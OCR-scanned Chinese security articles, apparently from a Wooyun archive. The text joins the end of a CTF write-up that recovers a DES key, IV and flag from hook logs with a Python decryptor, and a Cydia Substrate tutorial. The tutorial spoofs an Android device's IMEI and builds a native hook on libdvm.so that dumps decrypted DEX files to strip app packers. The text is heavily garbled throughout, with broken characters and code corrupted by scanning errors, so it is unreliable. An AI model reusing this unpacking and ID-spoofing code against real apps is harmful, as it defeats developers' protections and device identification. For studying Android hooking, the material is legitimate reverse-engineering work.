I/Introspy( 4273): #4 GENERAL CRYPTO ### com.ali.encryption - javax.crypto.Cipher->init() 
I/Introspy( 4273): -> Mode: ENCRYPT MODE, Key format: RAW, Key: [H5jOqyCXc0+odcJFhT70dh+Yzqsqg13Dv] 


W/Introspy( 4273): #4 GENERAL CRYPTO ### com.ali.encryption - javax.crypto.Cipher-»-doFinal() 
W/Introspy( 4273): -> !!! -> Algo: DESede/CBC/PKCS5Padding; IV: AAoKCgoCAqo- 
I/Introspy( 4273): Equels String:000a0a20a0a20202aa5458d715704493d8e6b9bd38f8b6be0e 





通过 |log， 很 容易 就 能 看 出 来 evilapk400 使 用 了 DES 加 密 。 通 过 log 我 们 获取 了 密 文 ，Key 以 及 
IV， 所 以 我 们 可 以 写 一 个 python 程 序 来 计算 出 最 后 的 答案 : 


from M2Crypto.EVP import Cipher 
from base64 import b64encode, b64decode 


key = b64decode('H5jOqyCXcO-*odcJFhT70dh*Yzqsgl3Dv') 

iv = b64decode( 'AAoKCgoCAgo=' ) 

ciphertext = '5458d715704493d8e6b9bd38f8b6be0e' .decode( 'hex' ) 
decipher = Cipher(alg-'des ede3 cbc', key-key, op=0, iv=iv) 
plaintext = decipher .update(ciphertext) 

plaintext += decipher.final() 

print plaintext 


$ python decrypt.py 
日 天 @ 土 全 


aliray@ubuntu:~/7weapons/libiegou/JavaHook$ python decrypt.py 





日 天 6 土 伍 


提示 


wes! ! ! 破解 成 功 ! ! ! 


确定 





0x05 总 结 


本 篇 介绍 了 native 层 ，JNI 层 以 及 JAVA 层 的 hook， 基 本 上 可 以 满足 我 们 平时 对 于 android 上 
hook 的 需求 了 。 另 外 文章 中 所 有 提 到 的 代码 和 工具 都 可 以 在 我 的 github 下 载 到 ， 地 址 是 : 
https://github.com/zhengmin1989/TheSevenWeapons 


0x06 参考 资料 


Android 平 台 下 hook 框 架 adbi 的 研究 
(下 ) http://blog.csdn.net/roland_sun/article/details/36049307 
ALICTF Writeups from Dr. Mario 


原文 by RIZ 
注 : 框 架 有 风险 ,使 用 要 说 惯 . 


Cydia Substrate 是 一 个 代码 修改 平台 . 它 可 以 修改 任何 主 进程 的 代码 ,不 管 是 用 Java 还 是 C/C++ 
(native 代 码 ) 编写 的 .而 Xposed 只 支持 HOOK app process ¥ java & 2, Al suCydia 
Substrate 是 一 款 强 大 而 实用 的 HOOK 工 具 . 


官网 地 址 : http://www.cydiasubstrate.com/ 
官方 教程 : http:/www.cydiasubstrate.com/id/38be592b-bda7-4dd2-b049-cec44ef7a73b 


SDK 下 载 地 址 : http://asdk.cydiasubstrate.com/zips/cydia_substrate-r2.zip 


0x00 Hook Java 后 


之 前 讲解 过 xposed 的 用 法 为 啥 还 要 整 这 个 了 ,下 面 简单 对 比 两 款 框架 


d^ 


RNS 
Ay 


势 : 


没 哈 错 误 提 醒 , 排 错 比较 麻烦 . 

需要 对 NDK 开发 有 一 定 了 解 ,相对 xposed 模块 的 开发 学 习 成 本 高 一 些 . 
因为 不 开源 网 上 (github) 上 可 以 参考 的 模块 代码 很 少 . 

优势 


可 以 对 native 函数 进行 hook . 与 xposed hook 原理 不 一 样 ,因为 不 是 开源 具体 原理 我 也 不 清 
楚 . 结果 就 是 一 些 Anti hook 可 能 对 xposed 有 效 而 对 Cydia 无 效 . 
使 用 方法 


1. 安装 框架 app : http://www.cydiasubstrate.com/download/com.saurik.substrate.apk 


2. 创建 一 个 空 的 Android 工 程 .由 于 创建 的 工程 将 以 插件 的 形式 被 加 载 ,所 以 不 需要 activity. 将 
SDK 中 的 substrate-api.jar 复 制 到 project/libs 文 件 夹 中 . 


3. 配置 Manifest 文 件 


«manifest xmlns:android="http://schemas.android.com/apk/res/android"> 
<application> 
<meta-data android:name="com.saurik.substrate.main" 
android: value=".Main"/> 
</application> 
«uses-permission android:name-"cydia.permission.SUBSTRATE"/» 
«/manifest» 


4. 创建 一 个 类 ,类 名 为 Main. 类 中 包含 一 个 static 方 法 initialize, 当 插件 被 加 载 的 时 候 , 该 方法 中 
的 代码 就 会 运行 ,完成 一 些 必要 的 初始 化 工作 . 


import com.saurik.substrate.MS; 
public class Main { 
static void initialize() { 
// ... code to run when extension is loaded 
} 


j 


5. hook imei example 


import com.saurik.substrate.MS; 
public class Main { 
Static void anttialize() { 
MS.hookClassLoad( "android. telephony. TelephonyManager", 
new MS.ClassLoadHook() { 
@SuppressWarnings("unchecked" ) 
public void classLoaded(Class<?> arg0) { 
Method hookimei; 
try { 
hookimei = arg0.getMethod("getDevicelId", null); 
) catch (NoSuchMethodException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 
hookimei - null; 


} 
if (hookimei != null) { 
final MS.MethodPointer old1 = new MS.MethodPointer(); 
MS.hookMethod(argO, hookimei, new MS.MethodHook() { 
@Override 
public Object invoked(Object arg0, 
Object... argi1) throws Throwable { 
// TODO Auto-generated method stub 


System.out.println("hook imei----------- Sle 

String imei = (String) old1.invoke(arg0, 
argi); 

System.out.println("imei-------- >" + imei); 


imei = "999996015409998"; 
return imei; 


j 
3, oldi); 


3); 


6. 在 cydia app 界面 中 点 击 Link Substrate Files 之 后 重启 手机 





Unlink Substrate Files 
Restart System (Soft) 


Contribute via PayPal 


Open Cydia Gallery 


Remember (really, this is the one actually important 
thing): if your device ever can't boot due to a broken 
Substrate extension, you can hold your volume-up key to 
temporarily disable Substrate, allowing your activity to 


complete. 





— 


.使 用 getimei 的 小 程序 验证 imei 是 否 被 改变 


public class MainActivity extends ActionBarActivity { 

private static final String tag = "MainActivity"; 

TextView mText ; 

@Override 

protected void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity main); 
mText - (TextView) findViewById(R.id.text); 
TelephonyManager mtelehonyMgr - (TelephonyManager) getSystemService(this.TELE 

PHONY SERVICE); 
Build bd - new Build(); 
String imei - mtelehonyMgr.getDeviceId(); 
String imsi - mtelehonyMgr.getSubscriberId(); 
//getSimSerialNumber ( ) 获取 SIM 序列 号 getLine1lNumber 获取 手机 号 
String androidId = Secure.getString(getApplicationContext().getContentResolve 

r(), Secure.ANDROID ID); 
String id - UUID.randomUUID().toString(); 
String model - bd.MODEL; 
StringBuilder sb - new StringBuilder(); 
sb.append("imei = "+ imei); 
sb.append("\nimsi = " + imsi); 
sb.append("\nandroid_id = " + androidId); 
sb.append("\nuuid = " + id); 
sb.append("\nmodel = " + model); 
if (imei!=null) 

mText.setText(sb.toString()); 
else 
mText.setText("fail"); 


2， 关 键 api 介 绍 


MS.hookClassLoad: 该 方法 实现 在 指定 的 类 被 加 载 的 时 候 发 出 通知 (改变 其 实现 方式 ?). 因 为 一 
个 类 可 以 在 任何 时 候 被 加 载 ,所 以 Substrate 提 供 了 一 个 方法 用 来 检测 用 户 感 兴趣 的 类 何 时 被 加 
载 . 


这 个 api 需 要 实现 一 个 简单 的 接口 MS.ClassLoadHook, 该 接口 只 有 一 个 方法 classLoaded, 当 类 
被 加 载 的 时 候 该 方法 会 被 执行 .加 载 的 类 以 参数 形式 传 入 此 方法 . 


void hookClassLoad(String name, MS.ClassLoadHook hook); 
参数 描述 
name 包 名 + 类 名 ,使 用 java 的 .符号 (被 hook 的 完整 类 名 】 
hook MS .ClassLoadHook 的 一 个 实例 , 当 这 个 类 被 加 载 的 时 候 , 它 的 classLoaded 方 法 会 被 执行 ， 
MS.hookClassLoad("java.net.HttpURLConnection", 
new MS.ClassLoadHook() { 
public void classLoaded(Class<?> class) { 
/* do something with class argument */ 
} 


Ne 


MS.hookMethod: 该 API 人 允许 开发 者 提供 一 个 回调 函数 替换 原来 的 方法 ,这 个 回调 函数 是 一 个 实 
现 了 MS.MethodHook 接 口 的 对 象 ,是 一 个 典型 的 匿名 内 部 类 . 它 包含 一 个 invoked 有 函数 . 


void hookMethod(Class _class, Member member, MS.MethodHook hook, MS.MethodPointer old) 


参数 描述 
_class 加 载 的 目标 类 ,为 classLoaded 传 下 来 的 类 参数 


member 通过 反射 得 到 的 需要 hook 的 方法 (或 构造 函数 ) ， 注 意 : 不 能 HOOK 字 段 (在 编译 的 时 候 会 进 
hook MS .MethodHook 的 一 个 实例 ,其 包含 的 invoked 方 法 会 被 调用 ,用 以 代替 member 中 的 代码 


0x01 Hook Native 后 


这 块 的 功能 xposed 就 不 能 实现 啦 . 
整个 流程 大 致 如 下 : 


创建 工程 ,添加 NDK 支持 
将 cydia 的 库 和 头 文 件 加 入 工程 
修改 AndroidManifest 配 置 文件 
修改 Android.md 
开发 模块 
指定 要 hook 49 lib 库 
保留 原来 的 地 址 
替换 的 函数 
Substrate entry point 
MSGetlmageByName or dlopen 
MSFindSymbol or dlsym or nlist 指定 方法 ,得 到 开始 地 址 
MSHookFunction 替换 函数 
使 用 方法 


第 零 步 :添加 ndk 支持 ,将 cydia 的 库 和 头 文件 加 入 工程 


行 检测 ) . 


v 19 DumpDex 
> (src 
> 28 gen [Generated Java Files] 
> =} Android 4.2.2 
> = Android Private Libraries 
= Android Dependencies 
> ot Binaries 
> HH Archives 
> inj Includes 
v Bini 
> | 日 DumpDex.cy.cpp 
> |h] substrate.h 
| & Android.mk 
libsubstrate.so 
libsubstrate-dvm.so 
> Ea libs 
> (= obj 
=|, assets 
> c» bin 
b s res 
43 AndroidManifest.xml 
| ic. launcher-web.png 
proguard-project.txt 
=) project. properties 


drops.wooyun.or 
b. e | a d-s55- i P = 8 


注意 要 是 XXX.Cy.cCpp, 不 要 忘记 .cy 
其 实 应 该 是 动态 链接 库 名 称 中 的 cy 必须 有 ,所 有 在 Android.md 中 module 处 的 .cy 必须 带 上 咯 


LOCAL MODULE := DumpDex2.cy 
第 一 步 :修改 配置 文件 


«manifest xmlns:android-"http://schemas.android.com/apk/res/android" 
android:installLocation-"internalOnly" > 
«application android:hasCode="false"> 
</application> 


«uses-permission android:name-"cydia.permission.SUBSTRATE"/» 
«/manifest» 


设置 android:hasCode 属性 false,i&€ £ android:installLocation Æ t£ internalOnly" 


第 二 步 :指定 要 hook 的 lib È 


#include <substrate.h> 


MSConfig(MSFilterExecutable, "/system/bin/app_process") //MSConfig(MSFilterLibrary, " 
liblog.so") 


// this is a macro that uses — attribute (( constructor )) 
MSInitialize { 

// ... code to run when extension is loaded 
} 


设置 要 hook 的 可 执行 文件 或 者 动态 库 
第 三 步 : 等 待 class 


static void OnResources(JNIEnv *jni, jclass resources, void *data) { 
// ... code to modify the class when loaded 
} 


MSInitialize { 
MSJavaHookClassLoad(NULL, "android/content/res/Resources", &OnResources); 
} 


第 四 步 :修改 实现 


Static Jant (*“zResourcesS$getColon)i(InNteEnv “na jobject this; =) 


static jint $Resources$getColor(JNIEnv *jni, jobject _this, jint rid) { 
jint color = _Resources$getColor(jni, _this, rid); 
return color & -0x0000ff00 | OxO00ff0000; 

} 


static void OnResources(JNIEnv *jni, jclass resources, void *data) { 
jmethodID method = jni->GetMethodID(resources, "getColor", "(I)I"); 
if (method != NULL) 
MSJavaHookMethod(jni, resources, method, 
&$Resources$getColor, &_Resources$getColor) ; 


下 面 是 步骤 是 在 官网 教程 基础 上 对 小 白 同学 的 一 些 补充 吧 . 


» file libprocess.so 
libprocess.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked 
(uses shared libs), not stripped 


第 五 步 


复制 libsubstrate-dvm.so( 注 意 arm 和 x86 平 台 的 选择 ) 和 substrate.h 到 jni 目录 下 .创建 
SuperMathHook.cy.cpp 文 件 


配置 Android.mk 文 件 


LOCAL_PATH := $(call my-dir) 


include $(CLEAR_VARS ) 
LOCAL_MODULE:= substrate-dvm 


LOCAL_SRC_FILES 


:= libsubstrate-dvm.so 


include $(PREBUILT SHARED LIBRARY) 


include $(CLEAR VARS) 


LOCAL MODULE 
LOCAL SRC FILES 
LOCAL LDLIBS :- 
LOCAL LDLIBS += 
X8 HE. 


:= SuperMathHook.cy 

:= SuperMathHook.cy.cpp 

-llog 

-L$(LOCAL_PATH) -lsubstrate-dvm //-L 指 定 库 文件 的 目录 , -1 指定 库 文 件 名 ，- 工 指定 头 


include $(BUILD SHARED LIBRARY) 


加 入 c 的 lib 


LOCAL_PATH := $(call my-dir) 


include $(CLEAR_VARS) 
LOCAL_MODULE:= substrate-dvm 


LOCAL_SRC_FILES 


:= libsubstrate-dvm.so 


include $(PREBUILT_SHARED_LIBRARY) 


include $(CLEAR VARS) 
LOCAL MODULE:- substrate 


LOCAL SRC FILES 


:= libsubstrate.so 


include $(PREBUILT SHARED LIBRARY) 


include $(CLEAR VARS) 


LOCAL MODULE 

LOCAL SRC FILES 
LOCAL LDLIBS :- 
LOCAL LDLIBS += 


:= CydiaN.cy 

:= CydiaN.cy.cpp 

-llog 

-L$(LOCAL_PATH) -lsubstrate-dvm -lsubstrate 


include $(BUILD_SHARED_LIBRARY ) 


strings 查看 下 里 面 的 函数 . 


/data/data/com.jerome.jni/lib # strings libprocess.so 


< 


/system/bin/linker 


. cxa finalize 
. cxa atexit 
Jstring2CStr 
malloc 

memcpy 


aeabi unwind cpp. prO 





Java com jerome jni JNIProcess getInfoMD5 





脱党 机 模块 开发 


网 上 流传 的 IDA dump Jo ZU X Sue TF: 


对 /system/lib/libdvm.so 方法 JNI OnLoad/dvmLoadNativeCode/dvmDexFileOpenPartial 下 断 点 
分 析 

IDA 附加 app (IDA6.5 以 及 之 后 版 本 ) 

Ctrl+s 查看 基地 址 + 偏 移 

IDA 分 析 寻 找 dump 点 

F8/F9 执 行 到 dex 完 全 被 解密 到 内 存 中 时 候 进行 dump 

现在 目标 就 是 通过 Cydia 的 模块 来 自动 化 完成 这 个 功能 .这 里 咱 选择 对 
dvmDexFileOpenPartial £Z& 3t £1 hook. 至 于 为 什么 要 选择 这 里 了 ?这 就 需要 分 析 下 android 
dex 优 化 过 程 


Android 会 对 每 一 个 安装 的 应 用 的 dex 文 件 进行 优化 ,生成 一 个 odex 文 件 . 相 比 于 dex 文 件 ,odex 文 
件 多 了 一 个 optheader 依 赖 库 信 息 (dex 文 件 所 需要 的 本 地 函数 库 ) 和 辅助 信息 (类 索引 信息 
等 ) . 


dex 的 优化 过 程 是 一 个 独立 的 功能 模块 来 实现 的 ,位 于 
http://androidxref.com/4.4.3 r1.1/xref/dalvik/dexopt/OptMain.cpp£57 其 
T extractAndProcessZip() 函数 完成 优化 操作 . 


http://androidxref.com/4.1.1/xref/dalvik/dexopt/OptMain.cpp 


OptMain T 4 main $ že 3t Æ te 2 dex 4) x& Jg 45 AV 


int main(int argc, char* const argv[]) 


t 
set process name("dexopt"); 
setvbuf(stdout, NULL, _IONBF, 0); 
if (argc > 1) { 
if (strcmp(argv[1], "--zip") == 0) 
return fromzip(argc, argv); 
else if (strcmp(argv[1], "--dex") == 0) 
return fromDex(argc, argv); 
else if (strcmp(argv[1], "--preopt") == 0) 
return preopt(argc, argv); 
} 
return 
} 


可 以 看 到 ,这 里 会 分 别 对 3 中 类 型 的 文件 做 不 同 处 理 ,我 们 关心 的 是 dex 文 件 , 所 以 接 下 来 看 看 
fromDex $% žr : 


static int fromDex(int argc, char“ const argv[]) 

1 

if (dvmPrepForDexOpt(bootClassPath, dexOptMode, verifyMode, flags) != 0) ( 
ALOGE("VM init failed"); 


goto bail; 
} 


vmStarted = true; 

/* do the optimization */ 

if (!dvmContinueOptimization(fd, offset, length, debugFileName, 
modwhen, crc, (flags & DEXOPT IS BOOTSTRAP) != 0)) 


ALOGE("Optimization failed"); 
goto bail; 


这 个 函数 先 初 始 化 了 一 个 虚拟 机 ,然后 调用 dvmcontinueoptimization % žk 


/dalvik/vm/analysis/DexPrepare.cpp ,进入 这 个 函数 : 


bool dvmContinueOptimization(int fd, off t dexOffset, long dexLength, 
const char* fileName, u4 modWhen, u4 crc, bool isBootstrap) 


1 
5 
* Rewrite the file. Byte reordering, structure realigning, 
* class verification, and bytecode optimization are all performed 
* here. 
* 
* In theory the file could change size and bits could shift around. 
* In practice this would be annoying to deal with, so the file 
* layout is designed so that it can always be rewritten in place. 
* 
* This creates the class lookup table as part of doing the processing. 
* 
// 
success = rewriteDex(((u1*) mapAddr) + dexOffset, dexLength, 
doVerify, doOpt, &pClassLookup, NULL); 
if (success) { 
DvmDex* pDvmDex = NULL; 
ui* dexAddr = ((u1*) mapAddr) + dexOffset; 
if (dvmDexFileOpenPartial(dexAddr, dexLength, &pDvmDex) != 0) ( 
ALOGE("Unable to create DexFile"); 
success - false; 
} else { 
} 


这 个 函数 中 对 Dex 文 件 做 了 一 些 优 化 (如 字 节 重 排 序 ,结构 对 齐 等 ) ,然后 重新 写 入 Dex 文 件 .如 
果 优 化 成 功 的 话 接 下 来 调用 dvmDexFileOpenPartial, 而 这 个 函数 中 调用 了 申 正 的 Dex 文 件 . 在 有 具 
体 看 看 这 个 函数 /dalvik/vm/DvmDex.cpp 


Create a DexFile structure for a "partial" DEX. This is one that is in 
the process of being optimized. The optimization header isn't finished 
and we won't have any of the auxillary data tables, so we have to do 
the initialization slightly differently. 


Returns nonzero on error. 
/ 
int dvmDexFileOpenPartial(const void* addr, int len, DvmDex** ppDvmDex) 


{ 


* 
* 
* 
* 
* 


DvmDex* pDvmDex; 
DexFile* pDexFile; 
int parseFlags = kDexParseDefault; 


int result = -1; 
/* -- file is incomplete, new checksum has not yet been calculated 
if (gDvm.verifyDexChecksum) 
parseFlags |= kDexParseVerifyChecksum; 
uA 


pDexFile = dexFileParse((u1*)addr, len, parseFlags); 
if (pDexFile -- NULL) ( 

ALOGE("DEX parse failed"); 

goto bail; 
} 


pDvmDex = allocateAuxStructures(pDexFile) ; 
if (pDvmDex == NULL) { 
dexFileFree(pDexFile) ; 
goto bail; 
} 
pDvmDex->isMappedReadOnly = false; 
*ppDvmDex = pDvmDex; 
result = 0; 


bail: 
return result; 


这 个 函数 的 前 两 个 参数 非常 关键 ,第 一 个 参数 是 dex 文 件 的 起 始 地址 ,第 二 个 参数 是 dex 文 件 的 长 
度 ,有 了 这 两 个 参数 ,就 可 以 从 内 存 中 将 这 Tae f dume PAT 这 也 是 在 此 函数 下 断 点 的 原 
因 . 该 函数 会 调用 dexFileParse() 对 dex 文 件 进行 解析 


Pt VA 4. dexFileParse & 2 2b 3k 3t 47 dump 也 是 可 行 的 .但 是 因为 这 个 函数 的 原型 是 


DexFile* dexFileParse(const ui* data, size t length, int flags) 其 返回 值 为 一 个 结构 体 指 
# struct DexFile { ... }, hook 这 个 函数 得 把 结构 体 从 android 源码 中 扣 出 来 或 者 直接 改 镜像 . 


4X 2] dvmDexFileOpenPartial 4 AA libdvm.so 对 应 的 名 称 


» strings libdvm_arm.so|grep dvmDexFileOpenPartial 
_Z21dvmDexFileOpenPartialPKviPP6DvmDex 


» strings libdvm_arm.so|grep dexFileParse 
_Z12dexFileParsePKhji 


有 了 上 述 理论 基础 ,现在 可 以 正式 开发 模块 了 .大 致 流程 如 下 


指定 要 hook 的 lib 库 

Original method template /& % 4k 4% th 

Modified method 替换 的 函数 

Substrate entry point 

MSGetlmageByName or dlopen 载 入 lib 得 到 image 
MSFindSymbol or dlsym or nlist 指定 方法 ,得 到 开始 地 址 
MSHookFunction 替换 函数 

完整 代码 


#include "substrate.h" 
#include <android/log.h> 
#include <unistd.h> 
#include <stdio.h> 
#include «fcntl.h» 
#include <sys/types.h> 
#include <string.h> 


#define BUFLEN 1024 

#define TAG "DEXDUMP" 

#define LOGD(...) __android_log_print(ANDROID_LOG_DEBUG, TAG, — VA ARGS ) 
#define LOGI(...) _ android log print(ANDROID LOG INFO, TAG, _ VA ARGS ) 


//get packagename from pid 

int getProcessName(char * buffer){ 
char path t[256]-(0); 
pid t pid-getpid(); 
char str[15]; 
sprintf(str, "96d", pid); 
memset(path t, O , sizeof(path t)); 
strcat(path t, "/proc/"); 
strcat(path t, str); 
Strcat (patchit “/cmdlanes)))- 
//LOG ERROR("zhw", "path:%s", path t); 
int fd t = open(path t, O RDONLY); 
if(fd_t>0){ 

int read_count = read(fd_t, buffer, BUFLEN); 


if (read_count>0) { 
int processIndex=0; 
for(processIndex-0;processIndex«strien(buffer);processIndex--*)( 
if(buffer[processIndex]--':')( 
buffer[processIndex]-' '; 
} 


} 
return 1; 
y 
} 
return 0; 


} 


// 指 定 要 hook 的 lib # 
MSConfig(MSFilterLibrary, "/system/lib/libdvm.so") 


// 保 留 原来 的 地 址 DexFile* dexFileParse(const u1* data, size t length, int flags) 
int (* oldDexFileParse)(const void * addr,int len,int flags); 


// 和 替换 的 函数 
int myDexFileParse(const void * addr,int len,void ** dvmdex) 


LOGD("call my dvm dex! !:%d",getpid()); 


{ 


//weite to fale 
//char buf[200]; 


// 导出 dex 文 件 
char dexbuffer[64]={0}; 
char dexbufferNamed[128]={0}; 
char * bufferProcess=(char*)calloc(256,sizeof(char)); 
int processStatus= getProcessName(bufferProcess); 
sprintf(dexbuffer, " dump 9d", len); 
strcat(dexbufferNamed, "/sdcard/"); 
if (processStatus==1) { 

strcat(dexbufferNamed, bufferProcess) ; 

strcat(dexbufferNamed, dexbuffer ); 


selsef{ 
LOGD("FAULT pid not found\n"); 
} 


if(bufferProcess!zNULL) 
{ 


free(bufferProcess); 


} 
strcat(dexbufferNamed,".dex"); 


//sprintf(buf,"/sdcard/dex.%d", len); 
FILE * f=fopen(dexbufferNamed, "wb"); 
if(!f) 

{ 


} 
else{ 


fwrite(addr,i,len, Ff); 
fclose(f); 


LOGD(dexbuffer + " : error open sdcard file to write"); 


// 进 行 原来 的 调用 ,不 影响 程序 运行 
return oldDexFileParse(addr, len, dvmdex); 


} 
//Substrate entry point 
MSInitialize 
x 
LOGD("Substrate initialized."); 
MSImageRef image; 
// 载 入 Lib 
image = MSGetImageByName("/system/lib/libdvm.so"); 
if (image != NULL) 
void * dexload=MSFindSymbol (image, "_Z21dvmDexFileOpenPartialPKviPP6DvmDex") ; 
if (dexload==NULL ) 
LOGD("error find _Z21dvmDexFileOpenPartialPKviPP6DvmDex "); 
else{ 
/ [8 3f BB 
//3.MSHookFunction 
MSHookFunction(dexload, (void* )&myDexFileParse, (void **)&oldDexFileParse) ; 
} 
else{ 
LOGD("ERROR FIND LIBDVM"); 
} 
} 


效果 如 下 : 


shell@hammerhead:/sdcard $ 1 |grep dex 
app_process_classes_3220.dex 
com.ali.tg.testapp classes 606716.dex 
com.chaozh.iReaderFree classes 4673256.dex 
com.secken.app xg service v2 classes 6327832.dex 


脱 壳 机 模块 改进 一 

更 改 hook 点 为 dexFileParse, 上 文 已 经 讲解 了 为 啥 也 可 以 选择 这 里 .也 分 析 了 dex 优化 的 过 程 ， 
这 里 在 分 析 下 dex 加 载 的 过 程 . 

DexClassLoader 广 泛 被 开发 者 用 于 插件 的 动态 加 载 .而 PathClassLoader 几 乎 没 怎么 见 过 . 


为 PathClassLoader 没有 提供 优化 dex 的 目录 而 是 固定 将 odex 存放 到 /data/dalvik-cache 
中 , 故 它 只 能 加 载 已 经 安装 到 Android 系统 中 的 apk 文件 ,也 就 是 /data/app 目录 下 的 apk x 
件 . 


PathClassLoader 和 DexClassLoader 父 类 为 BaseDexClassLoader 


http://androidxref.com/4.4.2 r1/xref/libcore/dalvik/src/main/java/dalvik/system/BaseDexClass 
Loader.java 


45 public BaseDexClassLoader(String dexPath, File optimizedDirectory, 
String libraryPath, ClassLoader parent) { 


http://androidxref.com/4.4.2 r1/xref/libcore/dalvik/src/main/java/dalvik/system/DexPathList.ja 
va 


DexPathList(this, dexPath, libraryPath, optimizedDirectory); 


260 private static DexFile loadDexFile(File file, File optimizedDirectory) 


http://androidxref.com/4.4.2 r1/xref/libcore/dalvik/src/main/java/dalvik/system/DexFile.java 


141 static public DexFile loadDex(String sourcePathName, String outputPathName, int fl 
ags) 

调用 native 8% native private static int openDexFileNative(String sourceName, String o 
utputName, int flags) 


294 private static int openDexFile(String sourceName, String outputName, 

295 int flags) throws IOException ( 

296 return openDexFileNative(new File(sourceName).getCanonicalPath(), 

297 (outputName -- null) ? null : new File(outputName) 
.getCanonicalPath(), 

298 flags); 

299 ) 


http://androidxref.com/4.4.2 r1/xref/dalvik/vm/native/dalvik system DexFile.cpp 


N 
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151 static void Dalvik_dalvik_system_DexFile_openDexFileNative(const u4* args, JValue* 


pResult ) 
7/249 static void Dalvik dalvik system DexFile openDexFile bytearray(const u4* args, J 


Value* pResult) 








http://androidxref.com/4.4.2 r1/xref/dalvik/vm/RawDexFile.cpp 


109 int dvmRawDexFileOpen(const char* fileName, const char* odexOutputName, RawDexFile 
** ppRawDexFile, bool isBootstrap) // 工 具 类 方法 打开 DEX 文 件 /Jar 文 件 


http://androidxref.com/4.4.4 r1/xref/dalvik/vm/DvmDex.cpp 


93 int dvmDexFileOpenFromFd(int fd, DvmDex** ppDvmDex) // 从 一 个 打开 的 DEX 文 件 , 映射 到 只 读 共 
享 内 存 并 且 解 析 内 容 

//146 int dvmDexFileOpenPartial(const void* addr, int len, DvmDex** ppDvmDex) // 通 过 地 
址 和 长 度 打开 部 分 DEX 文 件 


http://androidxref.com/4.4.4_r1/xref/dalvik/libdex/DexFile.cpp 


289 dexFileParse(const u1* data, size t length, int flags) // 解 析 dex 文 件 


Zr ikopenDexFile © 34 ii dvmDexFileOpenFromFd $ 474 M dexFileParse £& 4, 77 Dex X 
件 里 每 个 类 名 称 和 类 的 代码 所 在 索引 ,然后 dexFileParse 调 用 函数 dexParseOptData 来 把 
类 名 称 写 对 象 pDexFile->pClassLookup 里 面 ,当然 也 更 新 了 索引 


//Substrate entry point 
MSInitialize 
{ 
LOGD("Cydia Init"); 
MSImageRef image; 
// 载 入 Lib 
image = MSGetImageByName("/system/1lib/libdvm.so"); 
if (image != NULL) 


{ 
void * dexload=MSFindSymbol( image, "_Zi2dexFileParsePKhji"); 
if (dexload==NULL ) 
LOGD("error find _Z12dexFileParsePKhji"); 
} 
elsef{ 
// 替 换 函 数 
//3.MSHookFunction 
MSHookFunction(dexload, (void* )&myDexFileParse, (void **)&oldDexFileParse); 
} 
j 
else( 
LOGD("ERROR FIND LIBDVM"); 
} 
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加 入 encode 


优化 输出 


github 地 址 如 下 ,里 面 已 经 有 一 个 编译 好 但 是 没有 签名 的 apk T... 


https://github.com/WooyunDota/DumpDex 


16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 1294424 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 171848 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 130712 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 255224 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 3506712 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 1378824 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 700216 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 529032 
16242-16242/? I/DEXDUMP2: exclude shoot 

16242-16242/? D/DEXDUMP2: call myDexFileParse! pid: 16242 , pname : /system/bin/dexopt , size : 529032 
16242-16242/? I/DEXDUMP2: exclude shoot 

16216-16216/? D/DEXDUMP2: call myDexFileParse! pid: 16216 , pname : com.baidu.browser.apps bdservice v1 , size : 
16216-16216/? I/DEXDUMP2: continue 

16216-16216/? D/DEXDUMP2: /sdcard/mydex/com.baidu.browser.apps bdservice v1 605976.dex : dump well~ 
16287-16287/? D/DEXDUMP2: call myDexFileParse! pid: 16287 , pname : «pre-initialized» , size : 7291336 


如 果 提 取 的 是 encode 版 的 ,需要 decode — TF: 


base64 -D -i com.ali.tg.testapp 606716.dex.encode.dex -0 my.dex 


一 些 错误 排除 


NDK Symbol 'NULL' could not be resolved 
NDK 环 境 没 有 配 好 ,没有 找到 stddef.h 


> Resource 
Android 


Android Lint Preferences 


Builders 
> C/C++ Build 
Y C/C++ General 
> Code Analysis 

Code Style 
Documentation 
File Types 
Indexer 


o Paths and Symbols 


Configuration: 


Languages 
¢,cpp 


Default [Active ] 


Include directories 
G /Users/magic/Mac tras/ndk/android-ndk-r!0d/sources/cxx-stl/system/include 


Le ES Source Location 


Properties for CydiaN 


(£ Output Location 





国 References 


Sini 


Language Mappings 
Paths and Symbols 
Java Build Path 
> Java Code Style 
P Java Compiler 
> Java Editor 
Javadoc Location 
Project References 
Refactoring History 
Run/Debug Settings 
Task Tags 
XML Syntax 





tee /Users/magic/Mac tras/ndk/android-ndk-r10d/toolchains/arm-linux-androideabi-4.8/prebuilt/darwin-x86 64/lib/gcc/arm-linux-androideabi/4.8/include 
(& /Users/magic/Mac, tras/ndk/android-ndk-r!Od/toolchains/arm-linux-androideabi-4.8/prebuilt/darwin-x86, 64/lib/gcc/arm-linux-androideabi/4.8/include-fixed 
(@ /Users/magic/Mac. tras/ndk/android-ndk-r10d/platforms/android-19/arch-arm/usr/include 


drops wey or 


jni.h 头 文件 找 不 到 也 是 NDK 环 境 未 配置 好 ,或 者 编译 器 BUG. 先 强行 编译 一 次 若 问题 未 解决 就 


检查 下 NDK 环境 . 


如 果 遇 到 一 些 成 员 ref 到 两 种 头 文件 中 ,需要 配置 下 include. 我 在 使 用 mkdir 的 时 候 mode t 就 
